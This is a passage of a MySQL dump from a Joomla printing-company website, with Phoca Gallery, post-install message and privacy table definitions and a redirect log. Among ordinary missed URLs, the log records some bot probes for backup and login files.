/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_tags`
--

LOCK TABLES `j25_phocagallery_tags` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_tags` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_tags` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_tags_ref`
--

DROP TABLE IF EXISTS `j25_phocagallery_tags_ref`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_tags_ref` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `tagid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`),
  UNIQUE KEY `i_imgid` (`imgid`,`tagid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_tags_ref`
--

LOCK TABLES `j25_phocagallery_tags_ref` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_tags_ref` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_tags_ref` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_user`
--

DROP TABLE IF EXISTS `j25_phocagallery_user`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `userid` int(11) NOT NULL DEFAULT '0',
  `avatar` varchar(40) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `userid` (`userid`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_user`
--

LOCK TABLES `j25_phocagallery_user` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_user` DISABLE KEYS */;
INSERT INTO `j25_phocagallery_user` VALUES (1,62,'',1,0,0,'0000-00-00 00:00:00',1,NULL,'');
/*!40000 ALTER TABLE `j25_phocagallery_user` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_votes`
--

DROP TABLE IF EXISTS `j25_phocagallery_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_votes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `rating` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_votes`
--

LOCK TABLES `j25_phocagallery_votes` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_votes_statistics`
--

DROP TABLE IF EXISTS `j25_phocagallery_votes_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_votes_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `average` float(8,6) NOT NULL DEFAULT '0.000000',
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_votes_statistics`
--

LOCK TABLES `j25_phocagallery_votes_statistics` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_votes_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_votes_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_postinstall_messages`
--

DROP TABLE IF EXISTS `j25_postinstall_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_postinstall_messages` (
  `postinstall_message_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `extension_id` bigint(20) NOT NULL DEFAULT '700' COMMENT 'FK to #__extensions',
  `title_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for the title',
  `description_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for description',
  `action_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language_extension` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys',
  `language_client_id` tinyint(3) NOT NULL DEFAULT '1',
  `type` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action',
  `action_file` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method',
  `action` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'Action method name or URL',
  `condition_file` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'RAD URI to file holding display condition method',
  `condition_method` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'Display condition method, must return boolean',
  `version_introduced` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced',
  `enabled` tinyint(3) NOT NULL DEFAULT '1',
  PRIMARY KEY (`postinstall_message_id`)
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_postinstall_messages`
--

LOCK TABLES `j25_postinstall_messages` WRITE;
/*!40000 ALTER TABLE `j25_postinstall_messages` DISABLE KEYS */;
INSERT INTO `j25_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',0),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(4,700,'COM_CPANEL_MSG_HTACCESS_TITLE','COM_CPANEL_MSG_HTACCESS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/htaccess.php','admin_postinstall_htaccess_condition','3.4.0',0),(5,700,'COM_CPANEL_MSG_ROBOTS_TITLE','COM_CPANEL_MSG_ROBOTS_BODY','','com_cpanel',1,'message','','','','','3.3.0',0),(6,700,'COM_CPANEL_MSG_LANGUAGEACCESS340_TITLE','COM_CPANEL_MSG_LANGUAGEACCESS340_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/languageaccess340.php','admin_postinstall_languageaccess340_condition','3.4.1',0),(9,700,'COM_CPANEL_MSG_STATS_COLLECTION_TITLE','COM_CPANEL_MSG_STATS_COLLECTION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/statscollection.php','admin_postinstall_statscollection_condition','3.5.0',0),(10,700,'PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME','PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_BODY','PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_ACTION','plg_system_updatenotification',1,'action','site://plugins/system/updatenotification/postinstall/updatecachetime.php','updatecachetime_postinstall_action','site://plugins/system/updatenotification/postinstall/updatecachetime.php','updatecachetime_postinstall_condition','3.6.3',1),(11,700,'COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_TITLE','COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/joomla40checks.php','admin_postinstall_joomla40checks_condition','3.7.0',1),(12,700,'TPL_HATHOR_MESSAGE_POSTINSTALL_TITLE','TPL_HATHOR_MESSAGE_POSTINSTALL_BODY','TPL_HATHOR_MESSAGE_POSTINSTALL_ACTION','tpl_hathor',1,'action','admin://templates/hathor/postinstall/hathormessage.php','hathormessage_postinstall_action','admin://templates/hathor/postinstall/hathormessage.php','hathormessage_postinstall_condition','3.7.0',1),(13,700,'PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_TITLE','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_BODY','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_ACTION','plg_captcha_recaptcha',1,'action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_condition','3.8.6',1),(14,700,'COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_TITLE','COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/updatedefaultsettings.php','admin_postinstall_updatedefaultsettings_condition','3.8.8',1),(15,700,'COM_ACTIONLOGS_POSTINSTALL_TITLE','COM_ACTIONLOGS_POSTINSTALL_BODY','','com_actionlogs',1,'message','','','','','3.9.0',1),(16,700,'COM_PRIVACY_POSTINSTALL_TITLE','COM_PRIVACY_POSTINSTALL_BODY','','com_privacy',1,'message','','','','','3.9.0',1),(17,700,'COM_CPANEL_MSG_ADDNOSNIFF_TITLE','COM_CPANEL_MSG_ADDNOSNIFF_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/addnosniff.php','admin_postinstall_addnosniff_condition','3.9.3',1),(18,700,'COM_CPANEL_MSG_TEXTFILTER3919_TITLE','COM_CPANEL_MSG_TEXTFILTER3919_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/textfilter3919.php','admin_postinstall_textfilter3919_condition','3.9.19',1),(19,700,'COM_CPANEL_MSG_HTACCESSSVG_TITLE','COM_CPANEL_MSG_HTACCESSSVG_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/htaccesssvg.php','admin_postinstall_htaccesssvg_condition','3.9.21',1),(20,700,'COM_ADMIN_POSTINSTALL_MSG_HTACCESS_AUTOINDEX_TITLE','COM_ADMIN_POSTINSTALL_MSG_HTACCESS_AUTOINDEX_DESCRIPTION','','com_admin',1,'message','','',NULL,NULL,'3.9.22',1),(21,700,'COM_ADMIN_POSTINSTALL_MSG_BEHIND_LOAD_BALANCER_TITLE','COM_ADMIN_POSTINSTALL_MSG_BEHIND_LOAD_BALANCER_DESCRIPTION','COM_ADMIN_POSTINSTALL_MSG_BEHIND_LOAD_BALANCER_ACTION','com_admin',1,'action','admin://components/com_admin/postinstall/behindproxy.php','behindproxy_postinstall_action','admin://components/com_admin/postinstall/behindproxy.php','admin_postinstall_behindproxy_condition','3.9.26',1);
/*!40000 ALTER TABLE `j25_postinstall_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_privacy_consents`
--

DROP TABLE IF EXISTS `j25_privacy_consents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_privacy_consents` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `state` int(10) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `remind` tinyint(4) NOT NULL DEFAULT '0',
  `token` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_privacy_consents`
--

LOCK TABLES `j25_privacy_consents` WRITE;
/*!40000 ALTER TABLE `j25_privacy_consents` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_privacy_consents` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_privacy_requests`
--

DROP TABLE IF EXISTS `j25_privacy_requests`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_privacy_requests` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `requested_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `status` tinyint(4) NOT NULL DEFAULT '0',
  `request_type` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token_created_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_privacy_requests`
--

LOCK TABLES `j25_privacy_requests` WRITE;
/*!40000 ALTER TABLE `j25_privacy_requests` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_privacy_requests` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_redirect_links`
--

DROP TABLE IF EXISTS `j25_redirect_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_redirect_links` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `old_url` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `new_url` varchar(2048) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `referer` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(4) NOT NULL,
  `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `header` smallint(3) NOT NULL DEFAULT '301',
  PRIMARY KEY (`id`),
  KEY `idx_link_modifed` (`modified_date`),
  KEY `idx_old_url` (`old_url`(100))
) ENGINE=InnoDB AUTO_INCREMENT=24887 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_redirect_links`
--

LOCK TABLES `j25_redirect_links` WRITE;
/*!40000 ALTER TABLE `j25_redirect_links` DISABLE KEYS */;
INSERT INTO `j25_redirect_links` VALUES (1,'http://ekv.workdl.org/index.php?Itemid=27','','http://ekv.workdl.org/index.php/delivery','',4,0,'2015-11-20 11:15:15','0000-00-00 00:00:00',301),(2,'http://ekv.workdl.org/index.php/portfolio','','http://ekv.workdl.org/index.php/delivery','',1,0,'2015-11-20 11:28:52','0000-00-00 00:00:00',301),(3,'http://ekv.workdl.org/images/favicon.ico','','','',17,0,'2015-11-20 14:35:25','0000-00-00 00:00:00',301),(4,'http://ekv.workdl.org/media/com_securitycheck/stylesheets/BebasNeue-webfont.woff','','http://ekv.workdl.org/media/com_securitycheck/stylesheets/jquery.percentageloader-0.1.css','',8,0,'2015-11-30 12:39:08','0000-00-00 00:00:00',301),(5,'http://ekv.workdl.org/media/com_securitycheck/stylesheets/BebasNeue-webfont.ttf','','http://ekv.workdl.org/media/com_securitycheck/stylesheets/jquery.percentageloader-0.1.css','',8,0,'2015-11-30 12:39:08','0000-00-00 00:00:00',301),(6,'http://ekv.workdl.org/administrator/components/com_phocagallery/assets/jcp/picker.js','','http://ekv.workdl.org/administrator/index.php?option=com_phocagallery&view=phocagalleryt','',3,0,'2015-11-30 13:00:30','0000-00-00 00:00:00',301),(7,'http://ekv.workdl.org/images/phocagallery/Citylights/thumbs/phoca_thumb_m3_Citylights-2.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(8,'http://ekv.workdl.org/images/phocagallery/Bannera/thumbs/phoca_thumb_m1_banner17.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(9,'http://ekv.workdl.org/images/phocagallery/Bannera/thumbs/phoca_thumb_m2_Banner-5.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(10,'http://ekv.workdl.org/images/phocagallery/Citylights/thumbs/phoca_thumb_m1_Citylights-1.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(11,'http://ekv.workdl.org/images/phocagallery/Plenki/thumbs/phoca_thumb_m3_Plenka-2.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(12,'http://ekv.workdl.org/images/phocagallery/Plenki/thumbs/phoca_thumb_m1_Plenka-1.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(13,'http://ekv.workdl.org/images/phocagallery/Setki/thumbs/phoca_thumb_m2_Setka-6.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(14,'http://ekv.workdl.org/images/phocagallery/Setki/thumbs/phoca_thumb_m2_Setka-4.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(15,'http://ekv.workdl.org/images/phocagallery/Fotooboi/thumbs/phoca_thumb_m2_Fotooboi-4.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(16,'http://ekv.workdl.org/images/phocagallery/Setki/thumbs/phoca_thumb_m1_Setka-1.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(17,'http://ekv.workdl.org/images/phocagallery/Fotooboi/thumbs/phoca_thumb_m1_Fotooboi-3.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(18,'http://ekv.workdl.org/images/phocagallery/Fotooboi/thumbs/phoca_thumb_m2_Fotooboi-1.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(19,'http://ekv.workdl.org/images/phocagallery/Bumaga-bluback/thumbs/phoca_thumb_m1_Bumaga-bluback-1.jpg','','http://ekv.workdl.org/portfolio','',2,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(20,'http://ekv.workdl.org/images/phocagallery/Bumaga-bluback/thumbs/phoca_thumb_m3_Bumaga-bluback-1.jpg','','http://ekv.workdl.org/portfolio','',2,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(21,'http://ekv.workdl.org/images/phocagallery/Kartini/thumbs/phoca_thumb_m1_Kartini-1.jpg','','http://ekv.workdl.org/portfolio','',2,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(22,'http://ekv.workdl.org/images/phocagallery/Kartini/thumbs/phoca_thumb_m2_Kartini-3.jpg','','http://ekv.workdl.org/portfolio','',2,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(23,'http://ekv.workdl.org/images/phocagallery/Kartini/thumbs/phoca_thumb_m2_Kartini-2.jpg','','http://ekv.workdl.org/portfolio','',2,0,'2015-11-30 13:10:36','0000-00-00 00:00:00',301),(24,'http://ekv.workdl.org/images/phocagallery/Bannera/thumbs/phoca_thumb_m1_banner16.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:48','0000-00-00 00:00:00',301),(25,'http://ekv.workdl.org/images/phocagallery/Citylights/thumbs/phoca_thumb_m3_Citylights-1.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:48','0000-00-00 00:00:00',301),(26,'http://ekv.workdl.org/images/phocagallery/Citylights/thumbs/phoca_thumb_m1_Citylights-2.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:48','0000-00-00 00:00:00',301),(27,'http://ekv.workdl.org/images/phocagallery/Bannera/thumbs/phoca_thumb_m2_Banner-9.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:48','0000-00-00 00:00:00',301),(28,'http://ekv.workdl.org/images/phocagallery/Bannera/thumbs/phoca_thumb_m2_Banner-11.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:48','0000-00-00 00:00:00',301),(29,'http://ekv.workdl.org/images/phocagallery/Plenki/thumbs/phoca_thumb_m3_Plenka-1.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:48','0000-00-00 00:00:00',301),(30,'http://ekv.workdl.org/images/phocagallery/Setki/thumbs/phoca_thumb_m1_Setka-3.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:49','0000-00-00 00:00:00',301),(31,'http://ekv.workdl.org/images/phocagallery/Plenki/thumbs/phoca_thumb_m1_Plenka-2.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:49','0000-00-00 00:00:00',301),(32,'http://ekv.workdl.org/images/phocagallery/Fotooboi/thumbs/phoca_thumb_m1_Fotooboi-4.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:49','0000-00-00 00:00:00',301),(33,'http://ekv.workdl.org/images/phocagallery/Fotooboi/thumbs/phoca_thumb_m2_Fotooboi-3.jpg','','http://ekv.workdl.org/portfolio','',1,0,'2015-11-30 13:10:49','0000-00-00 00:00:00',301),(34,'http://ekv.workdl.org/administartor','','','',1,0,'2015-12-08 13:55:09','0000-00-00 00:00:00',301),(35,'http://ekv.workdl.org/tmp/price.xls','','http://ekv.workdl.org/price','',2,0,'2015-12-09 09:27:29','0000-00-00 00:00:00',301),(36,'http://ekvatorprint.com.ua/images/favicon.ico','','http://ekvatorprint.com.ua/','',110449,0,'2015-12-09 13:39:54','0000-00-00 00:00:00',301),(37,'http://ekvatorprint.com.ua/media/system/js/mootools.js','','http://ekvatorprint.com.ua/','',10,0,'2015-12-09 16:35:10','0000-00-00 00:00:00',301),(38,'http://www.ekvatorprint.com.ua/images/favicon.ico','','http://www.ekvatorprint.com.ua/','',464,0,'2015-12-09 16:59:25','0000-00-00 00:00:00',301),(39,'http://ekvatorprint.com.ua/components/com_phocagallery/assets/phocagallery.css','','','',1,0,'2015-12-10 07:22:16','0000-00-00 00:00:00',301),(40,'http://ekvatorprint.com.ua/browserconfig.xml','','','',150,0,'2015-12-10 07:42:41','0000-00-00 00:00:00',301),(41,'http://ekvatorprint.com.ua/bigdump/bigdump.php','','','',1,0,'2015-12-10 08:10:44','0000-00-00 00:00:00',301),(42,'http://ekvatorprint.com.ua/bigdump.php','','','',5,0,'2015-12-10 08:10:45','0000-00-00 00:00:00',301),(43,'http://ekvatorprint.com.ua/forum/bigdump.php','','','',1,0,'2015-12-10 08:10:45','0000-00-00 00:00:00',301),(44,'http://ekvatorprint.com.ua/forums/bigdump.php','','','',1,0,'2015-12-10 08:10:45','0000-00-00 00:00:00',301),(45,'http://ekvatorprint.com.ua/dump/bigdump.php','','','',1,0,'2015-12-10 08:10:46','0000-00-00 00:00:00',301),(46,'http://ekvatorprint.com.ua/admin/bigdump.php','','','',1,0,'2015-12-10 08:10:46','0000-00-00 00:00:00',301),(47,'http://ekvatorprint.com.ua/admin/dump/bigdump.php','','','',1,0,'2015-12-10 08:10:46','0000-00-00 00:00:00',301),(48,'http://ekvatorprint.com.ua/backup/bigdump.php','','','',1,0,'2015-12-10 08:10:47','0000-00-00 00:00:00',301),(49,'http://ekvatorprint.com.ua/backup/bigdump/bigdump.php','','','',1,0,'2015-12-10 08:10:47','0000-00-00 00:00:00',301),(50,'http://ekvatorprint.com.ua/dump/bigdump/bigdump.php','','','',1,0,'2015-12-10 08:10:47','0000-00-00 00:00:00',301),(51,'http://ekvatorprint.com.ua/wp-includes/js/colorpicker.js','','','',1,0,'2015-12-10 08:10:48','0000-00-00 00:00:00',301),(52,'http://ekvatorprint.com.ua/misc/batch.js','','','',1,0,'2015-12-10 08:10:49','0000-00-00 00:00:00',301),(53,'http://ekvatorprint.com.ua/js/prototype/prototype.js','','','',1,0,'2015-12-10 08:10:49','0000-00-00 00:00:00',301),(54,'http://ekvatorprint.com.ua/dump.sql','','','',14,0,'2015-12-10 08:10:49','0000-00-00 00:00:00',301),(55,'http://ekvatorprint.com.ua/forum/dump.sql','','','',1,0,'2015-12-10 08:10:50','0000-00-00 00:00:00',301),(56,'http://ekvatorprint.com.ua/forums/dump.sql','','','',1,0,'2015-12-10 08:10:50','0000-00-00 00:00:00',301),(57,'http://ekvatorprint.com.ua/backup.sql','','','',16,0,'2015-12-10 08:10:50','0000-00-00 00:00:00',301),(58,'http://ekvatorprint.com.ua/forum/backup.sql','','','',1,0,'2015-12-10 08:10:51','0000-00-00 00:00:00',301),(59,'http://ekvatorprint.com.ua/forums/backup.sql','','','',1,0,'2015-12-10 08:10:51','0000-00-00 00:00:00',301),(60,'http://ekvatorprint.com.ua/forums/clientscript/vbulletin_global.js','','','',1,0,'2015-12-10 08:10:52','0000-00-00 00:00:00',301),(61,'http://ekvatorprint.com.ua/forum/clientscript/vbulletin_global.js','','','',1,0,'2015-12-10 08:10:52','0000-00-00 00:00:00',301),(62,'http://ekvatorprint.com.ua/clientscript/vbulletin_global.js','','','',1,0,'2015-12-10 08:10:52','0000-00-00 00:00:00',301),(63,'http://ekvatorprint.com.ua/favicon.ico','','','',33259,0,'2015-12-10 10:27:23','0000-00-00 00:00:00',301),(64,'http://ekvatorprint.com.ua/apple-touch-icon-120x120-precomposed.png','','','',1102,0,'2015-12-10 10:53:04','0000-00-00 00:00:00',301),(65,'http://ekvatorprint.com.ua/apple-touch-icon-120x120.png','','','',1123,0,'2015-12-10 10:53:05','0000-00-00 00:00:00',301),(66,'http://ekvatorprint.com.ua/apple-touch-icon-precomposed.png','','','',6953,0,'2015-12-10 10:53:06','0000-00-00 00:00:00',301),(67,'http://ekvatorprint.com.ua/apple-touch-icon.png','','','',8048,0,'2015-12-10 10:53:06','0000-00-00 00:00:00',301),(68,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=9','','','',58,0,'2015-12-10 17:17:54','0000-00-00 00:00:00',301),(69,'http://ekvatorprint.com.ua/templates/gk_ilife/images/news_image_interface_bg.png','','http://ekvatorprint.com.ua/templates/gk_ilife/css/gk_stuff.css','',743,0,'2015-12-10 19:22:14','0000-00-00 00:00:00',301),(70,'http://ekvatorprint.com.ua/templates/gk_ilife/images/arrow.gif','','http://ekvatorprint.com.ua/templates/gk_ilife/css/joomla_classes.css','',741,0,'2015-12-10 19:22:14','0000-00-00 00:00:00',301),(71,'http://ekvatorprint.com.ua//wp-login.php','','','',40,0,'2015-12-11 06:05:36','0000-00-00 00:00:00',301),(72,'http://ekvatorprint.com.ua/blog/wp-login.php','','','',27,0,'2015-12-11 06:05:36','0000-00-00 00:00:00',301),(73,'http://ekvatorprint.com.ua/wordpress/wp-login.php','','','',24,0,'2015-12-11 06:05:36','0000-00-00 00:00:00',301),(74,'http://ekvatorprint.com.ua/wp/wp-login.php','','','',23,0,'2015-12-11 06:05:37','0000-00-00 00:00:00',301),(75,'http://ekvatorprint.com.ua/wp-content/plugins/xcloner-backup-and-restore/readme.txt','','','',1,0,'2015-12-11 06:31:10','0000-00-00 00:00:00',301),(76,'http://ekvatorprint.com.ua/wp-content/sedlex/backup-scheduler/','','','',1,0,'2015-12-11 06:31:10','0000-00-00 00:00:00',301),(77,'http://ekvatorprint.com.ua/wp-content/plugins/wp-db-backup/readme.txt','','','',1,0,'2015-12-11 06:31:10','0000-00-00 